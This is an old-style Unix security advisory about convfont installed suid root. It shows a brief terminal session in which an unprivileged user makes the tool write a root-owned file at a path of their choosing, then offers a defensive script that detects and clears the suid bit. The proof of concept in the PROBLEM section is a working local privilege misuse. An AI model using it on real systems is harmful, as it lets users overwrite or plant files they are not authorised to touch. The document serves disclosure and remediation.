COMMAND

    convfont(1)

SYSTEMS AFFECTED

    Systems using SVGAlib with convfont suid root.

PROBLEM

    A suid root convfont lets any user who can run it write to any file:
    the output font file is written with root's privileges.

    $ echo >/tmp/file "Hello"
    $ ls -l /tmp/file
    -rw-------   1 looser  users      6 Mar  9 00:02 /tmp/file
    $ ls -l /usr/local/bin/convfont
    -rwsr-xr-x   1 root    root    2272 May 26 1994  /usr/local/bin/convfont*
    $ /usr/local/bin/convfont /tmp/file 6 /tmp/new-root-file
    Converting 1 characters
    Writing font file.
    $ ls -l /tmp/new-root-file
    -rw-------   1 root    users   8192 Mar  9 00:03 /tmp/new-root-file

    /tmp/new-root-file is "Hello" followed by a lot of space.

SOLUTION

    Turn the suid bit off on convfont.
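
    The fix as a script, added here as an example (it is not part of the
    original advisory): it reports whether a file carries the suid bit and
    clears it. The function names are made up for this example; pass the
    path of convfont as shown in the listing under PROBLEM.

```shell
#!/bin/sh
# Added example: audit one binary for the suid bit and clear it.
# Usage: sh fix-suid.sh /usr/local/bin/convfont   (script name is hypothetical)

# Print one of: missing, not-suid, suid-root, suid-other
suid_state() {
    target=$1
    [ -f "$target" ] || { echo missing; return 0; }
    [ -u "$target" ] || { echo not-suid; return 0; }
    # Field 3 of `ls -ln` is the numeric uid of the owner.
    owner=$(ls -ln "$target" | awk '{print $3}')
    if [ "$owner" = 0 ]; then
        echo suid-root
    else
        echo suid-other
    fi
}

# Clear the suid bit if it is set, then confirm it is really gone.
# Returns 0 when the file ends up without the bit, 1 otherwise.
strip_suid() {
    target=$1
    case $(suid_state "$target") in
        missing)  echo "$target: not found" >&2; return 1 ;;
        not-suid) echo "$target: suid bit already off"; return 0 ;;
    esac
    ls -l "$target"                 # mode before the change
    chmod u-s "$target" || return 1
    [ ! -u "$target" ] || return 1  # verify, do not trust chmod's exit code alone
    ls -l "$target"                 # mode after the change
}

# Only act when a path is given on the command line.
if [ $# -gt 0 ]; then
    strip_suid "$1"
fi
```

    With the bit off, convfont runs with the caller's own privileges, so
    the output file can only be created where that user may already write.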